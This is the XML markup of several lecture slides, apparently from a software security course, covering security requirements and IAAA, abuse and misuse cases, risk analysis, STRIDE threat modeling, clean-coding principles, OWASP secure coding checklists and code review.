          <p:cNvPr id="213" name="Google Shape;213;p36"/>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Derived from security Mechanisms IAAA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need an authentication scheme such as a login functionality using  username and password.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need a proper authorization scheme to specify who can do what. For example, a role based access control is needed in blackboard to distinguish the privileges of instructors and students.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Need a proper audit scheme to know who did what and when. For example, all modification events are logged.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Abuse Case</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="219" name="Google Shape;219;p37"/>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Think of cases that a security requirement can be broken </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Either accidentally by a legitimate user (Misuse case)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Or Intentionally by an attacker (Abuse case)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Abuse cases are opposite of use cases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Abuse Case Example</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="Google Shape;225;p38"/>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6" name="Google Shape;226;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2233750" y="690425"/>
            <a:ext cx="6286500" cy="4381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Risk Analysis</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="Google Shape;232;p39"/>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high level software architecture is very helpful.  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Help understand components and their interactions with the environment.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Even some basic information will be helpful: language, port, service, accounts, third-party components, privilege, access control.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Three steps:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Attack resistance analysis, Ambiguity analysis, Weakness analysis (of external software dependencies)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>knowledge </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>knowledge of attack patterns and exploit graphs, design principles, security issues in commonly used frameworks and other third-party components</a:t>
            </a:r>
            <a:endParaRPr/>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Threat Modeling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="Google Shape;238;p40"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="835675"/>
            <a:ext cx="8074200" cy="3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Microsoft STRIDE Model</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spoofing: a person or a program successfully</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> identifies as another by falsifying data, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>to gain an illegitimate access.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Tampering: illegitimate modification of data or </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>system to cause harm.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Repudiation: Denial of the truth or validity of something.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Information disclosure: illegitimate disclosure of information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Denial of service: denial of service for legitimate usage.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Elevation of privilege: illegitimate elevated access to restricted resources by exploiting some vulnerabilities in the system.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39" name="Google Shape;239;p40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5514425" y="932375"/>
            <a:ext cx="3300774" cy="1856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Threat Modeling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="835675"/>
            <a:ext cx="5059800" cy="373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6" name="Google Shape;246;p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="941350"/>
            <a:ext cx="8520602" cy="36275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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Google Shape;252;p42"/>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Microsoft Threat Modeling Tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.microsoft.com/en-us/securityengineering/sdl/threatmodeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>OWASP Dragon: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://owasp.org/www-project-threat-dragon/</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IAAA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Google Shape;72;p16"/>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Identification: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>Who</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> is the one?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authentication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s the user authentic?</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Login with username and password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Digital signature</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" u="sng"/>
              <a:t>what</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> authorized users can do (who can do what?)	</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Access list, capability list</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Work together with authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Accountability (Audit): (record or identify who did what when and how)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Through Log</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For access control, billing, planning, resource utilization, etc.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nonrepudiation: assurance that someone cannot deny something</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Often provided by a dedicated server to perform access control.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;7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Coding </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Google Shape;258;p43"/>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Target not only functionality (it works), but also quality</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Keep it simple and readable (KISS)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Bad smells: large classes, long methods</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Name convention</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Necessary comments</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Do not repeat yourself (DRY)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Maintain good file/package structures</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Pair programming and code review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Incremental and iterative approach</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Identify bad smells and constantly refactor the code</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>More on bad smells and refactoring: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sourcemaking.com/refactoring/smells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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Secure Coding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="264" name="Google Shape;264;p44"/>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OWASP secure coding practices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://owasp.org/www-pdf-archive/OWASP_SCP_Quick_Reference_Guide_v2.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Provide a checklist based on well known vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>For example:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Input validation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Output encoding</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Error handling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>File management</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="45720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Review</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;270;p45"/>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People make mistakes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Part of quality assurance process</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Fagan inspection is a more formal process. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
